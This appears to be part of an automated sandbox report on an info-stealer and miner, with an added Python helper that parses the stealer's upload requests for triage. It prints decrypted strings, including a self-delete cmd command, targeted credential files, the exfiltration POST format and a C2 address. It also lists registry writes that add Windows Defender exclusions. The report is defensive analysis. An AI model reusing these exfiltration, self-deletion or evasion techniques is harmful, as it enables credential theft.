                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack String decryptor: loginusers.vdf
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack String decryptor: \Steam\
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack String decryptor: sqlite3.dll
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack String decryptor: browsers
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack String decryptor: done
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack String decryptor: soft
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack String decryptor: \Discord\tokens.txt
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack String decryptor: /c timeout /t 5 & del /f /q "
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack String decryptor: " & del "C:\ProgramData\*.dll"" & exit
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack String decryptor: C:\Windows\system32\cmd.exe
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack String decryptor: https
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack String decryptor: POST
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack String decryptor: HTTP/1.1
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack String decryptor: Content-Disposition: form-data; name="
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack String decryptor: hwid
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack String decryptor: build
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack String decryptor: token
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack String decryptor: file_name
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack String decryptor: file
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack String decryptor: message
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack String decryptor: screenshot.jpg
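The decrypted strings above spell out the stealer's upload request (POST, HTTP/1.1, Content-Type: multipart/form-data; boundary=----, form fields hwid, build, token, file_name, file and message), and the Networking section below carries the one URL the configuration extractor recovered (http://185.172.128.76/3cd2b41cbde8fc9c.php). The Python below is an added triage helper written for this report, not code from the sample or from Joe Sandbox: it parses a request of that shape and pulls out the metadata a responder pivots on (hwid, build, token, the name of the stolen file). The request bytes are constructed; the boundary shape (----, then characters from ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890) and the C2 path shape (16 hex characters plus .php) are assumptions derived from the strings on this page, not vetted signatures.

```python
"""Triage of a stealer upload POST shaped like the decrypted strings in this report.

Added example, not code from the sample or from Joe Sandbox. The request bytes
below are constructed to match the decrypted fragments (POST, HTTP/1.1,
multipart/form-data, fields hwid/build/token/file_name/file/message).
"""
import json
import re

STEALER_FIELDS = {"hwid", "build", "token"}   # metadata fields among the decrypted strings
# Assumption: boundary is "----" followed by characters from the decrypted
# charset ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 (the two strings sit next to each other).
BOUNDARY_RE = re.compile(r"----[A-Z0-9]+")
# Assumption: shape of the single C2 URL the config extractor recovered (16 hex chars + .php).
C2_PATH_RE = re.compile(r"^/[0-9a-f]{16}\.php$")
PARAM_RE = re.compile(rb'(\w+)="([^"]*)"')       # name="..." / filename="..." in a part header


def split_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, path, lower-cased headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, *header_lines = head.split(b"\r\n")
    method, path, _version = request_line.split(b" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip().decode()
    return method.decode(), path.decode(), headers, body


def parse_multipart(body: bytes, boundary: bytes) -> dict:
    """Return {field name: {"filename": str | None, "data": bytes}} for a multipart/form-data body."""
    parts = {}
    for chunk in body.split(b"--" + boundary)[1:]:
        if chunk.startswith(b"--"):              # closing delimiter "--<boundary>--"
            break
        if chunk.startswith(b"\r\n"):            # CRLF that follows the delimiter
            chunk = chunk[2:]
        part_head, _, data = chunk.partition(b"\r\n\r\n")
        if data.endswith(b"\r\n"):               # CRLF that precedes the next delimiter
            data = data[:-2]
        params = {k.decode(): v.decode() for k, v in PARAM_RE.findall(part_head)}
        if "name" in params:
            parts[params["name"]] = {"filename": params.get("filename"), "data": data}
    return parts


def triage_exfil(raw: bytes) -> dict:
    """Classify one request and extract the metadata a responder pivots on."""
    method, path, headers, body = split_request(raw)
    ctype = headers.get("content-type", "")
    m = re.search(r"boundary=([^;\s]+)", ctype)
    if method != "POST" or not ctype.startswith("multipart/form-data") or m is None:
        return {"verdict": "not_multipart_post", "path": path}
    boundary = m.group(1)
    fields = parse_multipart(body, boundary.encode())

    def text(name):
        return fields[name]["data"].decode("utf-8", "replace") if name in fields else None

    upload = fields.get("file")
    return {
        "verdict": "stealer_upload" if STEALER_FIELDS <= set(fields) else "unknown_multipart",
        "host": headers.get("host"),
        "path": path,
        "path_matches_c2_shape": bool(C2_PATH_RE.match(path)),
        "boundary_matches_shape": bool(BOUNDARY_RE.fullmatch(boundary)),
        "hwid": text("hwid"),
        "build": text("build"),
        "token": text("token"),
        "file_name": text("file_name"),
        "upload_filename": upload["filename"] if upload else None,
        "upload_bytes": len(upload["data"]) if upload else 0,
        "message": text("message"),
    }


SAMPLE_REQUEST = (  # constructed, not captured traffic; values are placeholders
    b"POST /3cd2b41cbde8fc9c.php HTTP/1.1\r\n"
    b"Host: 185.172.128.76\r\n"
    b"Content-Type: multipart/form-data; boundary=----7K2P9QX1M4ZB\r\n"
    b"\r\n"
    b'------7K2P9QX1M4ZB\r\nContent-Disposition: form-data; name="hwid"\r\n\r\nSAMPLE-HWID-0000\r\n'
    b'------7K2P9QX1M4ZB\r\nContent-Disposition: form-data; name="build"\r\n\r\nsample_build\r\n'
    b'------7K2P9QX1M4ZB\r\nContent-Disposition: form-data; name="token"\r\n\r\nsample_token\r\n'
    b'------7K2P9QX1M4ZB\r\nContent-Disposition: form-data; name="file_name"\r\n\r\n\\Discord\\tokens.txt\r\n'
    b'------7K2P9QX1M4ZB\r\nContent-Disposition: form-data; name="file"; filename="tokens.txt"\r\n\r\n'
    b"token: <sample>\r\n"
    b"------7K2P9QX1M4ZB--\r\n"
)

BENIGN_REQUEST = (  # constructed: an ordinary form upload with unrelated field names
    b"POST /upload HTTP/1.1\r\nHost: intranet.example\r\n"
    b"Content-Type: multipart/form-data; boundary=abc123\r\n\r\n"
    b'--abc123\r\nContent-Disposition: form-data; name="comment"\r\n\r\nhello\r\n'
    b'--abc123\r\nContent-Disposition: form-data; name="avatar"; filename="me.png"\r\n\r\n\x89PNG\r\n'
    b"--abc123--\r\n"
)

if __name__ == "__main__":
    print(json.dumps(triage_exfil(SAMPLE_REQUEST), indent=2))
```

Feed it the raw bytes of a reassembled request from a capture. The verdict only says the field set matches the decrypted names, so treat it as a triage hint and pivot on hwid, build and token across sessions rather than using it as a standalone detection.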

                        Bitcoin Miner

                        Source: Yara match File source: 36.1.0FR80IiNvxJZyXnpOgiDlYNV.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 32.1.PA8JWMmRYiQsN7iqTjOvjsbW.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 33.1.zUOgRazdYnb35XHU4UIsV9Yc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 43.1.OYqxk9G3x4R05N4I0KLZXbXg.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 38.1.68bEfZA6FBu6lC5BaADYSIdx.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 00000024.00000001.2063500056.0000000000843000.00000040.00000001.01000000.0000001B.sdmp, type: MEMORY
                        Source: Yara match File source: 00000020.00000001.1883456337.0000000000843000.00000040.00000001.01000000.00000017.sdmp, type: MEMORY
                        Source: Yara match File source: 00000021.00000001.1945506899.0000000000843000.00000040.00000001.01000000.00000018.sdmp, type: MEMORY
                        Source: Yara match File source: 0000002B.00000001.1972234564.0000000000843000.00000040.00000001.01000000.00000022.sdmp, type: MEMORY
                        Source: Yara match File source: 00000026.00000001.2017532049.0000000000843000.00000040.00000001.01000000.0000001D.sdmp, type: MEMORY
                        Source: Yara match File source: Process Memory Space: PA8JWMmRYiQsN7iqTjOvjsbW.exe PID: 8176, type: MEMORYSTR
                        Source: Yara match File source: Process Memory Space: zUOgRazdYnb35XHU4UIsV9Yc.exe PID: 7204, type: MEMORYSTR
                        Source: Yara match File source: Process Memory Space: 0FR80IiNvxJZyXnpOgiDlYNV.exe PID: 4252, type: MEMORYSTR

                        Compliance

                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Unpacked PE file: 4.2.VtmtVe55Jwcf3rOGIU1yezyh.exe.400000.0.unpack
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe Unpacked PE file: 11.2.yPlMO3UKyKRvoEYPhbGYOyT0.exe.400000.0.unpack
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe Unpacked PE file: 19.2.B46afLBMY0mokUgVdA9CQR52.exe.400000.0.unpack
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe Unpacked PE file: 21.2.t7IXQJi6R3tWUMJ8f9cQzMWm.exe.400000.0.unpack
                        Source: C:\Users\user\AppData\Local\H6XhhPCeuwAb2QQK3C3B1Lwl.exe Unpacked PE file: 27.2.H6XhhPCeuwAb2QQK3C3B1Lwl.exe.400000.0.unpack
                        Source: C:\Users\user\Pictures\l0nXYBHJHVq6UHyy1YDO9fn3.exe Unpacked PE file: 29.2.l0nXYBHJHVq6UHyy1YDO9fn3.exe.400000.0.unpack
                        Source: C:\Users\user\Pictures\6dpl9L7LbyabhVQNXZXXKjGL.exe Unpacked PE file: 34.2.6dpl9L7LbyabhVQNXZXXKjGL.exe.400000.0.unpack
                        Source: C:\Users\user\Pictures\ikL90ODaFTS7N6FbOffM2D1B.exe Unpacked PE file: 39.2.ikL90ODaFTS7N6FbOffM2D1B.exe.400000.0.unpack
                        Source: C:\Users\user\Pictures\G3pV8gTsWQBVrGpK4ooPrlxI.exe Unpacked PE file: 41.2.G3pV8gTsWQBVrGpK4ooPrlxI.exe.400000.0.unpack
                        Source: C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240423213748763.log
                        Source: C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exe File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240423213755078.log
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
                        Source: file.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                        Source: Binary string: appidpolicyconverter.pdbOGPS source: i7gUU3MlvTwbsK8r3hAjzW0p.exe, 00000009.00000003.1404026079.0000000001F16000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: XC:\wowakemalurac\89\zok hutaye.pdb source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1397303539.0000000005ED1000.00000004.00000020.00020000.00000000.sdmp, u5v8.0.exe, 0000000A.00000000.1394962827.0000000000411000.00000002.00000001.01000000.0000000A.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1453130738.0000000005D61000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1543933265.0000000005DC1000.00000004.00000020.00020000.00000000.sdmp, u69w.0.exe, 00000014.00000000.1448216913.0000000000411000.00000002.00000001.01000000.0000000F.sdmp, t7IXQJi6R3tWUMJ8f9cQzMWm.exe, 00000015.00000003.1718472453.0000000005DD1000.00000004.00000020.00020000.00000000.sdmp, l0nXYBHJHVq6UHyy1YDO9fn3.exe, 0000001D.00000003.1742788058.0000000005E61000.00000004.00000020.00020000.00000000.sdmp, u4dc.0.exe, 0000001F.00000000.1530061498.0000000000411000.00000002.00000001.01000000.00000016.sdmp, 6dpl9L7LbyabhVQNXZXXKjGL.exe, 00000022.00000003.1828785198.0000000005DF1000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\xuzajoraxiy_20\kolazuto93\rimixosugixe lerofulugo\d.pdb source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444036361.000000000418C000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1446288176.000000000424E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1450570795.000000000424E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1448867855.000000000424E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1449341280.000000000424E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445115527.0000000004221000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1443603426.000000000417B000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1442893486.00000000041EC000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1448071216.000000000424E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1442893486.00000000041C9000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445115527.0000000004203000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\relay.pdb source: Qg_Appv5.exe, 00000018.00000002.2204224716.0000000006C5B000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\x64\Release\XBundlerTlsHelper.pdb source: wr6XLbv7Ijp4TImjm1ouF4U2.exe, 0000001E.00000002.1881705606.000000014026E000.00000040.00000001.01000000.00000015.sdmp
                        Source: Binary string: hh.pdb source: i7gUU3MlvTwbsK8r3hAjzW0p.exe, 00000009.00000003.1404026079.0000000001F46000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: hh.pdbGCTL source: i7gUU3MlvTwbsK8r3hAjzW0p.exe, 00000009.00000003.1404026079.0000000001F46000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\xopuxokusi 56_texag poxibivo\tajicewudok\gosicuk_84\cifafu.pdb source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1484213650.0000000004B63000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1483831434.00000000041CC000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: appidpolicyconverter.pdb source: i7gUU3MlvTwbsK8r3hAjzW0p.exe, 00000009.00000003.1404026079.0000000001F16000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: wr6XLbv7Ijp4TImjm1ouF4U2.exe, 0000001E.00000002.1881705606.000000014026E000.00000040.00000001.01000000.00000015.sdmp
                        Source: Binary string: GC:\kibiyasehahul-fesivodacodela\yeh75\yexesunowop\54_du.pdb source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000000.1346148421.0000000000411000.00000002.00000001.01000000.00000006.sdmp, VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000002.2263801025.0000000004105000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000002.2255349183.0000000004155000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000000.1395492963.0000000000411000.00000002.00000001.01000000.0000000B.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000002.1918787360.00000000041C5000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000000.1442715755.0000000000411000.00000002.00000001.01000000.0000000E.sdmp, t7IXQJi6R3tWUMJ8f9cQzMWm.exe, 00000015.00000002.1930649503.0000000004385000.00000004.00000020.00020000.00000000.sdmp, t7IXQJi6R3tWUMJ8f9cQzMWm.exe, 00000015.00000000.1488476128.0000000000411000.00000002.00000001.01000000.00000010.sdmp, H6XhhPCeuwAb2QQK3C3B1Lwl.exe, 0000001B.00000000.1495901034.0000000000411000.00000002.00000001.01000000.00000012.sdmp, H6XhhPCeuwAb2QQK3C3B1Lwl.exe, 0000001B.00000002.1937881733.00000000040C6000.00000004.00000020.00020000.00000000.sdmp, l0nXYBHJHVq6UHyy1YDO9fn3.exe, 0000001D.00000000.1496485772.0000000000411000.00000002.00000001.01000000.00000013.sdmp, l0nXYBHJHVq6UHyy1YDO9fn3.exe, 0000001D.00000002.1941782899.00000000043D5000.00000004.00000020.00020000.00000000.sdmp, 6dpl9L7LbyabhVQNXZXXKjGL.exe, 00000022.00000002.2121441955.0000000004105000.00000004.00000020.00020000.00000000.sdmp, 6dpl9L7LbyabhVQNXZXXKjGL.exe, 00000022.00000000.1537881887.0000000000411000.00000002.00000001.01000000.00000019.sdmp
                        Source: Binary string: wntdll.pdbUGP source: Qg_Appv5.exe, 00000018.00000002.2188638150.0000000005240000.00000004.00000800.00020000.00000000.sdmp, Qg_Appv5.exe, 00000018.00000002.2083738036.00000000031E2000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: &SC:\sikozumohaf\rali\diso.pdb source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479226031.000000000421E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1485938094.0000000004F20000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479873402.00000000041C9000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1463116316.0000000004B21000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1481871080.00000000056BB000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1464141295.000000000423C000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1482681071.000000000528E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1466633552.00000000041AA000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1464787413.0000000004138000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479873402.00000000041AC000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1483796218.0000000006285000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1493616783.00000000057B0000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1483588875.0000000006032000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1481542444.0000000005BBE000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1480366545.0000000004F20000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1485918092.00000000064D8000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1493614495.0000000005292000.00000004.00000020.00020000.00000000.sdmp, PA8JWMmRYiQsN7iqTjOvjsbW.exe, 00000020.00000000.1532064546.0000000000411000.00000002.00000001.01000000.00000017.sdmp, zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000000.1534304535.0000000000411000.00000002.00000001.01000000.00000018.sdmp
                        Source: Binary string: wntdll.pdb source: Qg_Appv5.exe, 00000018.00000002.2188638150.0000000005240000.00000004.00000800.00020000.00000000.sdmp, Qg_Appv5.exe, 00000018.00000002.2083738036.00000000031E2000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: arp.pdbGCTL source: i7gUU3MlvTwbsK8r3hAjzW0p.exe, 00000009.00000003.1404026079.0000000001F39000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: wr6XLbv7Ijp4TImjm1ouF4U2.exe, 0000001E.00000002.1881705606.000000014026E000.00000040.00000001.01000000.00000015.sdmp
                        Source: Binary string: C:\kibiyasehahul-fesivodacodela\yeh75\yexesunowop\54_du.pdb source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000000.1346148421.0000000000411000.00000002.00000001.01000000.00000006.sdmp, VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000002.2263801025.0000000004105000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000002.2255349183.0000000004155000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000000.1395492963.0000000000411000.00000002.00000001.01000000.0000000B.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000002.1918787360.00000000041C5000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000000.1442715755.0000000000411000.00000002.00000001.01000000.0000000E.sdmp, t7IXQJi6R3tWUMJ8f9cQzMWm.exe, 00000015.00000002.1930649503.0000000004385000.00000004.00000020.00020000.00000000.sdmp, t7IXQJi6R3tWUMJ8f9cQzMWm.exe, 00000015.00000000.1488476128.0000000000411000.00000002.00000001.01000000.00000010.sdmp, H6XhhPCeuwAb2QQK3C3B1Lwl.exe, 0000001B.00000000.1495901034.0000000000411000.00000002.00000001.01000000.00000012.sdmp, H6XhhPCeuwAb2QQK3C3B1Lwl.exe, 0000001B.00000002.1937881733.00000000040C6000.00000004.00000020.00020000.00000000.sdmp, l0nXYBHJHVq6UHyy1YDO9fn3.exe, 0000001D.00000000.1496485772.0000000000411000.00000002.00000001.01000000.00000013.sdmp, l0nXYBHJHVq6UHyy1YDO9fn3.exe, 0000001D.00000002.1941782899.00000000043D5000.00000004.00000020.00020000.00000000.sdmp, 6dpl9L7LbyabhVQNXZXXKjGL.exe, 00000022.00000002.2121441955.0000000004105000.00000004.00000020.00020000.00000000.sdmp, 6dpl9L7LbyabhVQNXZXXKjGL.exe, 00000022.00000000.1537881887.0000000000411000.00000002.00000001.01000000.00000019.sdmp
                        Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UniversalInstaller.pdb source: Qg_Appv5.exe, 00000018.00000002.2204224716.00000000070FA000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\wowakemalurac\89\zok hutaye.pdb source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1397303539.0000000005ED1000.00000004.00000020.00020000.00000000.sdmp, u5v8.0.exe, 0000000A.00000000.1394962827.0000000000411000.00000002.00000001.01000000.0000000A.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1453130738.0000000005D61000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1543933265.0000000005DC1000.00000004.00000020.00020000.00000000.sdmp, u69w.0.exe, 00000014.00000000.1448216913.0000000000411000.00000002.00000001.01000000.0000000F.sdmp, t7IXQJi6R3tWUMJ8f9cQzMWm.exe, 00000015.00000003.1718472453.0000000005DD1000.00000004.00000020.00020000.00000000.sdmp, l0nXYBHJHVq6UHyy1YDO9fn3.exe, 0000001D.00000003.1742788058.0000000005E61000.00000004.00000020.00020000.00000000.sdmp, u4dc.0.exe, 0000001F.00000000.1530061498.0000000000411000.00000002.00000001.01000000.00000016.sdmp, 6dpl9L7LbyabhVQNXZXXKjGL.exe, 00000022.00000003.1828785198.0000000005DF1000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: arp.pdb source: i7gUU3MlvTwbsK8r3hAjzW0p.exe, 00000009.00000003.1404026079.0000000001F39000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UIxMarketPlugin.pdb source: Qg_Appv5.exe, 00000018.00000002.2204224716.0000000006F69000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\sikozumohaf\rali\diso.pdb source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479226031.000000000421E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1485938094.0000000004F20000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479873402.00000000041C9000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1463116316.0000000004B21000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1481871080.00000000056BB000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1464141295.000000000423C000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1482681071.000000000528E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1466633552.00000000041AA000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1464787413.0000000004138000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479873402.00000000041AC000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1483796218.0000000006285000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1493616783.00000000057B0000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1483588875.0000000006032000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1481542444.0000000005BBE000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1480366545.0000000004F20000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1485918092.00000000064D8000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1493614495.0000000005292000.00000004.00000020.00020000.00000000.sdmp, PA8JWMmRYiQsN7iqTjOvjsbW.exe, 00000020.00000000.1532064546.0000000000411000.00000002.00000001.01000000.00000017.sdmp, zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000000.1534304535.0000000000411000.00000002.00000001.01000000.00000018.sdmp

                        Change of critical system settings

                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{AF4B7D10-C04F-40BD-A9F0-1F789BBF0FCA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions Exclusions_Extensions
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{AF4B7D10-C04F-40BD-A9F0-1F789BBF0FCA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions exe
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exe Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{3FAACE9B-0B9D-4D37-90B5-C9D5F39DABA7}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions Exclusions_Extensions
